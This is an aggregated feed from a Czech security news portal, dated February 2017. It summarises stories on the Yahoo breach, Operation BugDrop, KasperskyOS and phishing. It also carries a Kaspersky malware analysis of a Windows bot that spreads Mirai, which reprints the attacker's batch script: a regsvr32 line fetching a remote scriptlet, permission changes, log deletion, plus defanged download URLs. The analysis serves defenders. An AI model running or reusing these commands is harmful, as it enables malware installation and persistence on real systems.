je internetový portál zaměřený na počítačovou bezpečnost, hacking, anonymitu, počítačové sítě, programování, šifrování, exploity, Linux a BSD systémy. Provozuje spoustu zajímavých služeb a podporuje příznivce v zajímavých projektech.


Hacks all the time. Engineers recently found Yahoo systems remained compromised

Ars Technica - 21 Únor, 2017 - 16:45

Some five months after Yahoo disclosed a security breach that exposed sensitive data for 500 million accounts, some of its systems remained compromised, according to a report published Tuesday. The report said that in light of the hacks, Verizon would knock $350 million off the price it would pay to acquire Yahoo's Internet business.

"A recent meeting between technical staff of the two companies revealed that some of Yahoo’s systems were compromised and might be difficult to integrate with Verizon’s AOL unit," The Wall Street Journal reported, citing unnamed people. Verizon remains concerned that the breaches may hamper user engagement and in the process make the assets less valuable. Yahoo responded by cutting $350 million from the original $4.83 billion price tag, bringing the deal value to about $4.48 billion. It wasn't clear precisely when the meeting occurred.

In a release issued jointly by Yahoo and Verizon, the companies said neither the breaches nor any losses arising from them will be taken into account in determining whether a "Business Material Adverse Effect" has occurred or whether certain closing conditions have been satisfied. In addition to the $350 million price cut, the companies agreed to split the costs of responding to the breaches.

Read 3 remaining paragraphs | Comments

Kategorie: Hacking & Security

Operace BugDrop: Neznámí útočníci nahráli 600 GB zvuku na zavirovaných počítačích - bezpečnost - 21 Únor, 2017 - 16:21
Specialisté ze CyberX objevili nový sofistikovaný virus , který útočil především na ukrajinské cíle a vzhledem ke svému cílení a rozsahu za ním nejspíše nestojí individuální útočníci, ale stát. [ArticleBox ORIGINÁL Internetem se šíří hodný virus. Chce chránit váš router : 179900] Analytici jej ...
Kategorie: Hacking & Security

Thugs who sent Brian Krebs heroin and a SWAT team sentenced

Sophos Naked Security - 21 Únor, 2017 - 15:39
No word on when we'll see the movie, but the plot points keep coming.

Watch out for phishing scams when preparing your tax return

Sophos Naked Security - 21 Únor, 2017 - 14:46
Phishing scams topped the IRS's Dirty Dozen list of tax scams for 2017

A Critical Review of PKI Security Policies and Message Digests/Hashes

InfoSec Institute Resources - 21 Únor, 2017 - 14:00

Introduction All of our articles in this series have looked at using the principles of Cryptography to secure the lines of communications from the sending party to the receiving party. Simply put, Cryptography is the science (or for that matter, the art of) scrambling and descrambling a message while it is in transit. The purpose […]

The post A Critical Review of PKI Security Policies and Message Digests/Hashes appeared first on InfoSec Resources.

Kategorie: Hacking & Security

Top 10 Linux Distro for Ethical Hacking and Penetration Testing

InfoSec Institute Resources - 21 Únor, 2017 - 14:00

A security-focused operating system is a hacker’s best companion as it helps them to discover the weaknesses in computer systems or computer networks. Whether you are pursuing a career in Information Security or working as a security professional or you are interested in this specific field of knowledge, you must be known of a decent […]

The post Top 10 Linux Distro for Ethical Hacking and Penetration Testing appeared first on InfoSec Resources.

Kategorie: Hacking & Security

Kaspersky: No whiff of Linux in our OS because we need new start to secure IoT - 21 Únor, 2017 - 13:32 Eugene Kaspersky, CEO of Kaspersky Lab, says its new KasperskyOS for securing industrial IoT devices does not contain "even the slightest smell of Linux", differentiating it from many other IoT products that have the open-source OS at the core.
Kategorie: Hacking & Security

Intent-Based Security Gains Momentum at RSA - 21 Únor, 2017 - 13:31 It isn't a buzzphrase on par with "artificial intelligence" yet, but intent-based security has been gathering steam, as evidenced at this week's RSA Conference.
Kategorie: Hacking & Security

KasperskyOS — Secure Operating System released for IoT and Embedded Systems

The Hacker News - 21 Únor, 2017 - 12:51
Russian cyber security and antivirus vendor Kaspersky Lab has made available the much awaited KasperskyOS, a secure-by-design operating system based on Microkernel architecture which is specially designed for network devices, industrial control systems and the Internet of Things. The operating system is not made for your average home PC; instead, it is meant to protect industrial systems and
Kategorie: Hacking & Security

EU se děsí Windows 10. Prý o nás vědí až příliš. Microsoft chystá změny - bezpečnost - 21 Únor, 2017 - 11:15
** Evropští úředníci chtějí, aby byly Desítky transparentnější ** Microsoft od jara skutečně chystá změny ** Ochráncům soukromí to ale nestačí
Kategorie: Hacking & Security

New(ish) Mirai Spreader Poses New Risks

Kaspersky Securelist - 21 Únor, 2017 - 09:56

A cross-platform win32-based Mirai spreader and botnet is in the wild and previously discussed publicly. However, there is much information confused together, as if an entirely new IoT bot is spreading to and from Windows devices. This is not the case. Instead, an accurate assessment is that a previously active Windows botnet is spreading a Mirai bot variant. So let’s make a level-headed assessment of what is really out there.

The earliest we observed this spreader variant pushing Mirai downloaders was January 2017. But this Windows bot is not new. The Windows bot’s spreading method for Mirai is very limited as well – it only delivers the Mirai bots to a Linux host from a Windows host if it successfully brute forces a remote telnet connection. So we don’t have a sensational hop from Linux Mirai to Windows Mirai just yet, that’s just a silly statement. But we do have a new threat and practical leverage of the monolithic Windows platform to further spread Mirai to previously unavailable resources. In particular, vulnerable SQL servers running on Windows can be a problem, because they can be Internet facing, and have access to private network connecting IP-based cameras, DVR, media center software, and other internal devices.

So, we observe a previously active bot family that now spreads Mirai bots to embedded Linux systems over a very limited delivery vector. It spreads both its own bot code and the new Mirai addition in stages, using multiple web resources and servers. These servers help provide a better timeline of operation for the operator. One of the directly related web hosts at downs.b591[.]com has been serving bot components since at least August 2014. And most of the bot’s functionality clearly traces back to public sources at least as early as 2013. It’s not the freshest code or most impressive leap.

Regardless, it’s unfortunate to see any sort of Mirai crossover between the Linux platform and the Windows platform. Much like the Zeus banking trojan source code release that brought years of problems for the online community, the Mirai IoT bot source code release is going to bring heavy problems to the internet infrastructure for years to come, and this is just a minor start.

Notably, the 2016 Mirai operations were unique for two reasons:

  • newly practical exploitation and misuse of IoT devices (mainly DVR, CCTV cameras, and home routers) on a large scale
  • record setting DDoS traffic generation, exceeding all previous volumes

The great volume of this Mirai-generated DDoS traffic in October 2016 took down a portion of the internet, and was severe enough to initiate investigations by the FBI and the DHS. At the time, they had not ruled out nation states’ activity due to the overall power of the Mirai botnets. But even those attacks were far from the work of nation states. Time will only tell if nation states choose to hide their destructive activity in plain sight in the Internet of Things – the capabilities are clearly available. Could we see a nation state interested in taking down wide swaths of the internet using this juvenile toolset? It’s very possible.

In response to the huge problem this poses to the internet infrastructure, over the past few months, our team and CERT have participated in multiple successful command and control takedown efforts that otherwise have posed problems for partners simply providing notifications. While some security researchers may describe these takedowns as “whack a mole”, these efforts resulted in relief from Gbps DDoS storms for major networks. And, we are happy to partner with more network operators to leverage our connections with CERTs, LE, and other partners around the world to further enable this success.

The Windows Spreader – Who What Where

This Windows bot code is richer and more robust than the Mirai codebase, with a large set of spreading techniques, including brute forcing over telnet, SSH, WMI, SQL injection, and IPC techniques. Some of the bot executables are signed with certificates stolen from Chinese manufacturers. The code runs on Windows boxes, and checks in to a hardcoded list of c2 for hosts to scan and attack. Upon successful intrusion, it can spread the Linux Mirai variant as needed over telnet. If tftp or wget are not present on the remote system, it attempts to copy a downloader to the system and executes it there. This downloader will pull down and execute the final Mirai bot. These devices include

  • IP-based cameras
  • DVR
  • Media center appliances
  • Various Raspberry and Banana Pi

Unfortunately, this code is clearly the work of a more experienced bot herder, new to the Mirai game, and possibly one that is not juvenile like the original Mirai operator set. Based on multiple artefacts, the word choice from string artefacts, the code having been compiled on a Chinese system, that the host servers are maintained in Taiwan, abuse of stolen code-signing certificates exclusively from Chinese companies, and other characteristics, it is likely that this developer/operator is Chinese speaking.

The addition of a Chinese-speaking malware author with access to stolen code-signing certificates, with the ability to rip win32 offensive code from multiple offensive projects effective against MSSQL servers around the world, and the ability to port the code into an effective cross-platform spreading bot, introduces a step up from the juvenile, stagnating, but destructive Mirai botnet operations of 2016. It introduces newly available systems and network for the further spread of Mirai bots. And it demonstrates the slow maturing of Mirai now that the source is publicly available.

Below is a proportional comparison of the second stage component’s IP geolocations (fb7b79e9337565965303c159f399f41b), frequently downloaded by vulnerable MSSQL and MySQL servers. It is served from one of two web hosts, both hosted in Taiwan :



When downloaded, it is copied to disk with one of several filenames and executed:

cab.exe, ms.exe, cftmon.exe

Clearly, emerging markets with heavy investment in technology solutions are hit the heaviest by this component.


The bot code and various components have been pulled together from other projects and previous sources. At runtime, code delivery occurs in a series of stages, from scanning and attacking online resources to downloading additional configuration files, fetching further instruction, and downloading and running additional executable code. Again, mostly all of these components, techniques, and functionality are several years old and are very large file objects.

Windows Spreader Infection Process
i.e. c:\windows\system\msinfo.exe (5707f1e71da33a1ab9fe2796dbe3fc74)
Changes DNS settings to,
downloads and executes
from hxxp://up.mykings[.]pw:8888/update.txt (02b0021e6cd5f82b8340ad37edc742a0)
hxxp://up.mykings[.]pw:8888/ver.txt (bf3b211fa17a0eb4ca5dcdee4e0d1256)


hxxp://img1.timeface[.]cn/times/b27590a4b89d31dc0210c3158b82c175.jpg (b27590a4b89d31dc0210c3158b82c175) to c:\windows\system\msinfo.exe (5707f1e71da33a1ab9fe2796dbe3fc74)

and runs with command line parameters “-create” “-run”

Downloads and executes hxxp://down.mykings[.]pw:8888/my1.html (64f0f4b45626e855b92a4764de62411b)

This file is a command shell script that registers a variety of files, including database connectivity libraries, and cleans up unneeded traces of itself on the system.

http://up.mykings[.]pw:8888/ups.rar (10164584800228de0003a37be3a61c4d)

It copies itself to the tasks directory, and installs itself as a scheduled job.
c:\windows\system32\cmd.exe /c sc start xWinWpdSrv&ping -n 6 && del c:\windows\system\msinfo.exe >> NUL
c:\program files\kugou2010\ms.exe (10164584800228de0003a37be3a61c4d)

Keylogger (hosted as comments within jpeg files)

This botnet operator hosts components embedded within jpeg comments, a technique they have been using since 2013. These techniques provide very large file objects. So, even a fresh image downloaded by this bot of Taylor Swift contains 2.3mb of keylogging code first seen 2016.10.30 (ad0496f544762a95af11f9314e434e94):

Modular bot code

Also interesting in this variant is the variety of its spreader capabilities in the form of blind SQLi (sql injection) and brute forcing techniques, compiled in from a “Cracker” library. This library enables “tasking” of various attacks. The bots are instructed on individual tasks per an encrypted file downloaded from the available c2.

[Cracker:IPC] [Cracker:MSSQL] [Cracker:MySQL] [Cracker:RDP] [Cracker:SSH] [Cracker:RDP] [Cracker:Telnet] [Cracker:WMI]

The Windows bot’s source appears to be developed in a fairly modular manner in C++, as functionality is broken out across source libraries:


Code signing certificates

The code signing certificates appear to be stolen from a solar and semiconductor grinding wafer products manufacturer in Northwest China, and an expired one.

Kaspersky Lab products detect and prevent infections from these bots.

File object scan verdicts

DangerousPattern.Multi.Generic (UDS)

Behavioral verdicts


Appendix c2 and url






Xi’ an JingTech electronic Technology Co.,LTD
‎sn: 65 f9 b9 66 60 ad 34 c1 c1 fe f2 97 26 6a 1b 36
Partner Tech(Shanghai)Co.,Ltd
sn: 26 59 63 33 50 73 23 10 40 17 81 35 53 05 97 60 39 76 89



Contents of http://down.mykings[.]pw:8888/my1.html

@echo off
mode con: cols=13 lines=1
if exist C:\downs\runs.exe start C:\downs\runs.exe
md C:\Progra~1\shengda
md C:\Progra~1\kugou2010
md C:\download
regsvr32 /s shell32.dll
regsvr32 /s WSHom.Ocx
regsvr32 /s scrrun.dll
regsvr32 /s c:\Progra~1\Common~1\System\Ado\Msado15.dll
regsvr32 /s jscript.dll
regsvr32 /s vbscript.dll
start regsvr32 /u /s /i:http://js.f4321y[.]com:280/v.sct scrobj.dll
attrib +s +h C:\Progra~1\shengda
attrib +s +h C:\Progra~1\kugou2010
attrib +s +h C:\download
cacls cmd.exe /e /g system:f
cacls cmd.exe /e /g everyone:f
cacls ftp.exe /e /g system:f
cacls ftp.exe /e /g everyone:f
cacls c:\windows\help\akpls.exe /e /g system:f
cacls c:\windows\help\akpls.exe /e /g everyone:f
cacls C:\Progra~1\Common~1\System\ado\msado15.dll /e /g system:f
cacls C:\Progra~1\Common~1\System\ado\msado15.dll /e /g everyone:f
reg delete “HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run” /v shell /f
del c:\windows\system32\wbem\se.bat
del c:\windows\system32\wbem\12345.bat
del c:\windows\system32\wbem\123456.bat
del c:\windows\system32\wbem\1234.bat
del c:\windows\system32\*.log
del %0

Contents of http://up.mykings[.]pw:8888/update.txt

http://img1.timeface[.]cn/times/b27590a4b89d31dc0210c3158b82c175.jpg c:\windows\system\msinfo.exe

http://down.mykings[.]pw:8888/my1.html c:\windows\system\my1.bat

Relevant Links

Malware Hijacks Microphones to Spy On Ukrainian Businesses, Scientists and Media

The Hacker News - 21 Únor, 2017 - 09:50
Ukraine has once again been a target of a potential hacking attack that infected computer systems from dozens of Ukrainian businesses with highly sophisticated malware, allowing hackers to exfiltrate sensitive data and eavesdrop on their network. Late last year, the country also suffered a power outage caused by the same group of hackers that targeted Ukraine's power grid with the BlackEnergy
Kategorie: Hacking & Security

Hackers who took control of PC microphones siphon >600 GB from 70 targets

Ars Technica - 20 Únor, 2017 - 22:38

Enlarge (credit: Defense Advanced Research Projects Agency)

Researchers have uncovered an advanced malware-based operation that siphoned more than 600 gigabytes from about 70 targets in a broad range of industries, including critical infrastructure, news media, and scientific research.

The operation uses malware to capture audio recordings of conversations, screen shots, documents, and passwords, according to a blog post published last week by security firm CyberX. Targets are initially infected using malicious Microsoft Word documents sent in phishing e-mails. Once compromised, infected machines upload the pilfered audio and data to Dropbox, where it's retrieved by the attackers. The researchers have dubbed the campaign Operation BugDrop because of its use of PC microphones to bug targets and send the audio and other data to Dropbox.

"Operation BugDrop is a well-organized operation that employs sophisticated malware and appears to be backed by an organization with substantial resources," the CyberX researchers wrote. "In particular, the operation requires a massive back-end infrastructure to store, decrypt, and analyze several GB per day of unstructured data that is being captured from its targets. A large team of human analysts is also required to manually sort through captured data and process it manually and/or with Big Data-like analytics."

Read 7 remaining paragraphs | Comments

Kategorie: Hacking & Security

News in brief: robot tax mooted; Kim Dotcom faces extradition; Apple buys biometrics start-up

Sophos Naked Security - 20 Únor, 2017 - 18:46
Your daily round-up of some of the other stories in the news

The beer engines that put computer security at risk

Sophos Naked Security - 20 Únor, 2017 - 18:40
Who'd have thought that buying a pair of beer engines could teach us a computer security lesson?

What makes for truly independent security product testing?

Sophos Naked Security - 20 Únor, 2017 - 17:12
It seems there's room for improvement when it comes to independent testing - but what are your thoughts on this?

Where does the buck stop when there’s a security breach?

Sophos Naked Security - 20 Únor, 2017 - 16:12
Is it the IT department's problem, or does the buck go as far as the C-suite? Opinions are polarised, but it's more nuanced in the real world

The quantified employee: new ways to be watched at work

Sophos Naked Security - 20 Únor, 2017 - 15:43
Your employer could be tracking not just the work you do, but your conversations, your emotions, your bathroom breaks and more. Are you ok with that?

SAP Risks – Fraud

InfoSec Institute Resources - 20 Únor, 2017 - 14:00

Welcome to the latest part of SAP Risks. After we finished with Espionage and Sabotage, let’s eat the last piece of this “sweet cake” dubbed Fraud. In my opinion, fraud is the most common issue in ERP System and other business applications. Most of Segregation of Duties scenarios are about fraud –if an attacker or […]

The post SAP Risks – Fraud appeared first on InfoSec Resources.

Kategorie: Hacking & Security

An Overview of the Public Key Infrastructure Parameters and Standards

InfoSec Institute Resources - 20 Únor, 2017 - 14:00

Review of the Last Article As our last couple of articles have explored, the Public Key Infrastructure (PKI) is a specialized form of Asymmetric Cryptography. Although the latter is deemed to be secure, the Public Key Infrastructure offers a higher level of security not only by using the Public Key/Private Key combination but also by […]

The post An Overview of the Public Key Infrastructure Parameters and Standards appeared first on InfoSec Resources.

Kategorie: Hacking & Security
Syndikovat obsah